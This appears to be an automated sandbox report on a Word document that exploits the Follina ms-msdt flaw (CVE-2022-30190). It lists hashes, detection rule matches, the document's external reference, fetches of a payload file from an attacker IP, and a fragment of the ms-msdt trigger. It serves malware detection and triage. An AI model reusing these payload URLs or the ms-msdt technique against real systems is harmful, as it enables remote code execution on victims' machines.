Edit tour

Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name:	doc782.docx
Analysis ID:	640879
MD5:	e7015438268464cedad98b1544d643ad
SHA1:	03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:	d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Tags:	CVE-2022-30190docFollinaObama186QbotTA570
Infos:

Detection

Follina CVE-2022-30190

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Snort IDS alert for network traffic

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1460 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x2d98:$re1: location.href = "ms-msdt:
dump.pcap	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1447:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
Click to see the 1 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) - Source IP: 185.234.247.119 - Destination IP: 192.168.2.22

Timestamp:	185.234.247.119192.168.2.2280491732036726 06/07/22-18:38:14.250872
SID:	2036726
Source Port:	80
Destination Port:	49173
Protocol:	TCP
Classtype:	Attempted User Privilege Gain

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: doc782.docx	Virustotal: Detection: 23%			Perma Link
Source: doc782.docx	ReversingLabs: Detection: 17%

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 185.234.247.119:80

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 185.234.247.119:80

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49173

Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive

Source: Joe Sandbox View

ASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.247.119

Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	String found in binary or memory: http://185.2
Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	String found in binary or memory: http://185.234.247.119/123.RES
Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	String found in binary or memory: http://185.234.247.119/123.RESyX
Source: ~WRS{93886B29-9649-4D5E-975D-770BA1081A48}.tmp.0.dr	String found in binary or memory: http://185.234.247.119:80/123.RES

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E4F5B659-EE23-4A39-84D5-F59507B69C67}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /123.RES HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive

Source: dump.pcap, type: PCAP	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FC6F522.RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67F97180.RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES, type: DROPPED	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784

Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: doc782.docx	Virustotal: Detection: 23%
Source: doc782.docx	ReversingLabs: Detection: 17%

Source: doc782.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\doc782.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$doc782.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR5F6D.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOCX@1/18@0/1

Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: ~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
doc782.docx	23%	Virustotal		Browse
doc782.docx	17%	ReversingLabs	Document-Office.Exploit.CVE-2021-40444

Source	Detection	Scanner	Label	Link
http://185.234.247.119:80/123.RES	2%	Virustotal		Browse
http://185.234.247.119:80/123.RES	0%	Avira URL Cloud	safe
http://185.234.247.119/123.RES	2%	Virustotal		Browse
http://185.234.247.119/123.RES	0%	Avira URL Cloud	safe
http://185.2	0%	Virustotal		Browse
http://185.2	0%	Avira URL Cloud	safe
http://185.234.247.119/123.RESyX	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.234.247.119/123.RES	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.234.247.119:80/123.RES	~WRS{93886B29-9649-4D5E-975D-770BA1081A48}.tmp.0.dr	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.2	~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	true	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://185.234.247.119/123.RESyX	~WRF{E8660B1F-DE23-4448-8E08-4E9A6601FD25}.tmp.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.234.247.119	unknown	Russian Federation		198004	INTERKONEKT-ASPL	true

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	640879
Start date and time: 07/06/202218:37:12	2022-06-07 18:37:12 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 47s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	doc782.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.expl.evad.winDOCX@1/18@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.286476876836956
Encrypted:	false
SSDEEP:	48:I3qiRBtkKYcOkYkdtclI1GIRnCJyDmHR/RzrxYkQ2MNbmH:KzLtONflI1Qv9Wk/MNbmH
MD5:	6BCB2F665A13AD491ECC953E7DC2600A
SHA1:	B6A006C08EFAB6680AE149871D3BCF72A899EB49
SHA-256:	9F3395C72A95FB68A06293DEF18EF7D872D85C587891BEBBFF6CA40739A12455
SHA-512:	3AA2E883787085CBD01D7A5C7172043EAA2B94608EA1F0CC5C8CF3352B8681A681F0795A4DED825CCE99C30FEEC478276FDD319B0E43AEEF2BAC6B1FF7415824
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z).)..aeL...7zg.S,...X.F...Fa.q............................E.c....I....).<"........5.7}.7KG...Q.....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{950185C1-D03B-43EE-9B9C-D0CDFF898355}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6721178351435934
Encrypted:	false
SSDEEP:	96:K8CyRac5sakKYEaoGi0S+rg3Ezw83pXUpX2EpJOBhXkOBh:zRaykKYE/GBfrcEzt3RUR2EPOBpkOB
MD5:	B1CC8BA869BD685529814B7A230CADC3
SHA1:	4EEC65DF18DE007DFF4A6BBF9FBE63CE88B799F5
SHA-256:	9D16A5F0E79E851A2DFAC0DC39DA298E387D4367F95A03CA21D59FA5EB84EBF2
SHA-512:	777E7C15960292D9AF91AF27046EE70394A30E0E5CFBA3D0A5165E0C625166C32BAC0A65617A016AFFE077B03E42C977230F724F9DCA8725EB3BB78F29147A38
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z.]..q..L.....1).S,...X.F...Fa.q.............................k....&@..y...>.........^...J.~....7M.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.8916224090210907
Encrypted:	false
SSDEEP:	3:yVlgsRlzLlUwIhVlWGgmPm7lcHkQ+27276:yPblzywI5W3Gm65+g22
MD5:	626D26BA67DC406AD2544367CDA6666C
SHA1:	000E7519E969A23460054A3B8C27E930CE9D9A38
SHA-256:	10F22C4182B3FBAF8BAAA5E8228E0E6773A64201BFFA93B9DC41F50EA6F30207
SHA-512:	E7FE264D610FD3BA698BFDBCA3CD547F24C831355881A2F4A4C487A884F66690DCDA190E1108BFA8CA394C544D8142F5E3619056AE90EB0D17167C040EC2CBA6
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.9.5.0.1.8.5.C.1.-.D.0.3.B.-.4.3.E.E.-.9.B.9.C.-.D.0.C.D.F.F.8.9.8.3.5.5.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28756379665444187
Encrypted:	false
SSDEEP:	96:KPLaryP7M08sHsfsFspsfIhsQ1L3bqiapvAowZOLuPvAowZOLuwH:Y7M0dfIOcLD
MD5:	8FE7BCE45842A9855FEA472DA76BF940
SHA1:	B6EE349F4083C102DD55840D33A213480BB35BC1
SHA-256:	93E1768BDDB1FF66F4DE6374ED5FE9DB9458141495A55C88E039BECB47C5CEBB
SHA-512:	5A59AAE7CE8FB220C5FEE4CC9658F9105E33E3E176C478447210763A6F86394C6D359474B5B4D91B33BCFC237BC02D670F1C29640728E60ABAA9AEEC194CD1FF
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z...... G..I-...MS,...X.F...Fa.q.............................S..-.I..oB.........../..8..L..=K!....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{74F2B178-00AE-424F-83E7-BA599E828254}.FSD

Download File

